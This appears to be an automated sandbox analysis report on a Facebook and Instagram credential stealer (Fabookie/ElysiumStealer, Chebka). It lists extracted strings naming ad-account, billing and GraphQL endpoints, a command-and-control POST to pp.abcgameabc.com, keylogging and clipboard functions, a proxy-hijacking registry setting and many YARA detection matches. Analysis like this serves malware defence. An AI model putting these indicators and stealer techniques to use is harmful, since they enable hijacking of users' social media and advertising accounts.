        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49725
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49724
        Source: svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: "epsilon_checkpoint"https://www.facebook.com/ads/manager/account_settings/account_billing""ACCOUNT_ID":""USER_ID":""token":"async_get_token":"{"adAccountID":"{access_token:"{"sessionID":"account_currency_ratio_to_usd:https://www.facebook.com/ajax/settings/account/email.php?__a=1&fb_dtsg_ag=@@https://www.facebook.com/friends/list"all_friends_data":{"count":https://www.facebook.com/friends"friends_container_request_count":{"count":av=&__user=&fb_dtsg=&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=AccountQualityHubPageListCardQuery&variables=%7B%22assetOwnerId%22%3A%22%22%7D&doc_id=4988503034498154https://www.facebook.com/api/graphql/datauserDatapages_can_administerhttps://business.facebook.com/adsmanager/manage/accounts?act="adtrust_dsl":&business_id=&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BillingAMNexusRootQuery&variables={"paymentAccountID":""}&doc_id=4075226092554060billable_account_by_payment_accountaccount_statusDISABLEDACTIVECLOSEDbalanceformattedbillable_account_tax_infobusiness_country_codecurrencystored_balance_statusprepay_account_balancebilling_threshold_currency_amountformatted_amountbilling_payment_accountbilling_payment_methodscredential__typenameExternalCreditCardPaymentPaypalBillingAgreementStoredBalanceExtendedCreditAdsToken&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=AccountQualityHubLandingPageQuery&doc_id=3953057938071449https://www.facebook.com/accountquality/?landing_page=insightsviewerad_accountsnodesadvertising_restriction_infoviewer_permissionsadminis_restrictedrestriction_daterestriction_typeaccount_userad_businessesbilling_txnsedgeshttps://www.facebook.com/ads/manage/invoices_generator/?ts=1281628800&time_end=1692929024&report=true&format=csv&act=https://www.facebook.com/ads/manage/invoices_generator/&variables=%7B%22paymentAccountID%22%3A%22%22%2C%22count%22%3A10%2C%22cursor%22%3Anull%2C%22filters%22%3A%5B%5D%2C%22start_time%22%3A1281628800%2C%22end_time%22%3A1692929024%7D&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BillingTransactionTableQuery&doc_id=5015578711817965https://www.facebook.com/ads/manager/billing_history/summary/&variables=%7B%22numOfGlobalScopesToLoad%22%3A500%2C%22businessPaginationCursor%22%3Anull%2C%22searchQuery%22%3A%22%22%2C%22assetTypeEnums%22%3A%5B%22AD_ACCOUNT%22%5D%2C%22numToLoad%22%3A50%2C%22localScopePaginationCursor%22%3Anull%2C%22bagIDs%22%3A%5B%22%22%5D%2C%22bypassAssetID%22%3A%22%22%2C%22bypassAssetTypeEnum%22%3A%22AD_ACCOUNT%22%2C%22bypassPermission%22%3Afalse%2C%22includeAllContainedAssetsIfBusinessAdmin%22%3Afalse%2C%22includeProfilePlusDelegatePages%22%3Afalse%7D&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=BusinessUnifiedScopingLocalSelectorSearchSourceQuery&doc_id=4492650077503003business_scopingglobal_scopesscope_namescope_idasset_listsasset_typeAD_ACCOUNTobjectsasset_idPragma: no-cache equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/Pragma: no-cache equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/accountquality/?landing_page=insights equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manage/invoices_generator/ equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manage/invoices_generator/?ts=1281628800&time_end=1692929024&report=true&format=csv&act= equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/account_settings/account_billing equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ads/manager/billing_history/summary/ equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/ajax/settings/account/email.php?__a=1&fb_dtsg_ag= equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/api/graphql/ equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/friends equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/friends/list equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/login/device-based/turn-on/ equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000002.809388892.00000244FE400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/marketplace?ref=bookmark equals www.facebook.com (Facebook)
        Source: svchost.exe, 00000009.00000003.415036548.00000244FF130000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.facebook.com/marketplace?ref=bookmarkflow=logged_in_settings&reload=1&__a=1&__user=https://www.facebook.com/login/device-based/turn-on/&fb_api_req_friendly_name=CometSinglePageRootQuery&variables=%7B%22height%22%3A132%2C%22pageID%22%3A%22%22%2C%22scale%22%3A1%2C%22width%22%3A132%7D&server_timestamps=true&doc_id=8186721178034804pageoverall_star_ratingvalue&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=CometPageCardsContainerQuery&variables=%7B%22location%22%3A%22SECONDARY_COLUMN%22%2C%22pageID%22%3A%22%22%2C%22scale%22%3A1%2C%22useDefaultActor%22%3Afalse%7D&server_timestamps=true&doc_id=5357079284328970comet_page_cardsfollower_count&session_id=&fb_api_caller_class=RelayModern&fb_api_req_friendly_name=AccountQualityUserPagesWrapper_UserPageQuery&variables=%7B%22assetOwnerId%22%3A%22%22%7D&server_timestamps=true&doc_id=519634422715525200000000000000000000000000000000kernel32.dllRtlGetNtVersionNumbersntdll.dllSOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\%sInstallLocation\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall\%sGoogle ChromeMicrosoft EdgeYandexBrowserSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\UninstallLauncher.exehttps://www.instagram.com/accounts/edit/"viewerId":""username":""email":""phone_number":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36HTTP/1.0Cookie: equals www.facebook.com (Facebook)
        Source: unknownHTTP traffic detected: POST /api4.php HTTP/1.1Accept: */*Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36Host: pp.abcgameabc.comContent-Length: 274Connection: Keep-AliveCache-Control: no-cache
        Source: unknownHTTPS traffic detected: 172.67.188.70:443 -> 192.168.2.3:49724 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.21.40.196:443 -> 192.168.2.3:49725 version: TLS 1.2
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_0463B840 GetAsyncKeyState,Sleep,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,5_2_0463B840
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046374B0 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalFix,GlobalUnWire,SetClipboardData,CloseClipboard,5_2_046374B0
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_04637510 OpenClipboard,IsClipboardFormatAvailable,GetClipboardData,GlobalFix,GlobalSize,GlobalUnWire,CloseClipboard,5_2_04637510

        E-Banking Fraud

        barindex
        Source: C:\Windows\System32\svchost.exeRegistry key created or modified: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings AutoConfigURL http://35.236.159.79/win.pacJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeCode function: 5_2_046365A0 CreateEventW,OpenDesktopW,CreateDesktopW,SetThreadDesktop,GetDesktopWindow,MonitorFromWindow,GetMonitorInfoW,EnumDisplaySettingsW,GetDC,CreateCompatibleDC,GetVersionExA,5_2_046365A0

        System Summary

        barindex
        Source: 20.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 20.0.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 25.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 25.0.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 7.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 7.2.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 18.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 18.0.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 9.2.svchost.exe.244fc400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 9.2.svchost.exe.244fc400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 11.2.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 11.2.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 17.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 17.2.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 34.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 34.0.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 19.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 19.2.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 22.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 22.2.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 25.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 25.2.svchost.exe.195990b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 27.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 27.2.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 30.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 30.2.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 11.0.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 11.0.svchost.exe.2d6cb270000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 23.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 23.2.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 18.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 18.2.svchost.exe.1f97f120000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 23.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 23.0.svchost.exe.226f8d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 7.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 7.0.svchost.exe.22baf530000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 33.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 33.2.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 19.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 19.0.svchost.exe.1b6d6000000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 29.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 29.2.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 28.0.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 28.0.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 37.2.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 37.2.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 35.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 35.2.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 36.2.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 36.2.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 29.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 29.0.svchost.exe.1f1ed200000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 37.0.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 37.0.svchost.exe.12dbc510000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 34.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 34.2.svchost.exe.1dd8fdb0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 22.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 22.0.svchost.exe.25139800000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 30.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 30.0.svchost.exe.1e554740000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 35.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 35.0.svchost.exe.28291080000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 33.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 33.0.svchost.exe.23e495b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 27.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 27.2.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPEMatched rule: Detects Fabookie / ElysiumStealer Author: ditekSHen
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 5.2.rundll32.exe.4630000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 33.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 33.0.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 32.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 32.0.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 20.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 20.0.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 29.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 29.2.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 35.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 35.2.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 19.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 19.0.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 30.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 30.0.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 7.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 7.0.svchost.exe.22baf530000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 17.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 17.0.svchost.exe.1dbfc920000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 17.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 17.2.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 11.0.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 11.0.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 25.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 25.2.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 35.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 35.0.svchost.exe.28291080000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 18.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 18.0.svchost.exe.1f97f120000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 28.2.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 28.2.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 30.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 30.2.svchost.exe.1e554740000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 19.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 19.2.svchost.exe.1b6d6000000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 36.0.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 36.0.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 32.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 32.2.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 29.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 29.0.svchost.exe.1f1ed200000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 28.2.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 28.2.svchost.exe.24e72070000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 33.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 33.2.svchost.exe.23e495b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 27.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 27.0.svchost.exe.236f3940000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 25.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 25.0.svchost.exe.195990b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 36.0.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 36.0.svchost.exe.151abe70000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 20.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 20.2.svchost.exe.2468b5b0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 11.2.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 11.2.svchost.exe.2d6cb270000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 20.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 20.2.svchost.exe.2468b5b0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 32.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 32.0.svchost.exe.1af63d40000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 22.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 22.0.svchost.exe.25139800000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 17.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 17.0.svchost.exe.1dbfc920000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 28.0.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 28.0.svchost.exe.24e72070000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 23.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 23.2.svchost.exe.226f8d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 36.2.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 36.2.svchost.exe.151abe70000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 27.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 27.0.svchost.exe.236f3940000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 37.0.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
        Source: 37.0.svchost.exe.12dbc510000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Generic_a681f24a Author: unknown
        Source: 32.2.svchost.exe.1af63d40000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Chebka Author: ditekSHen
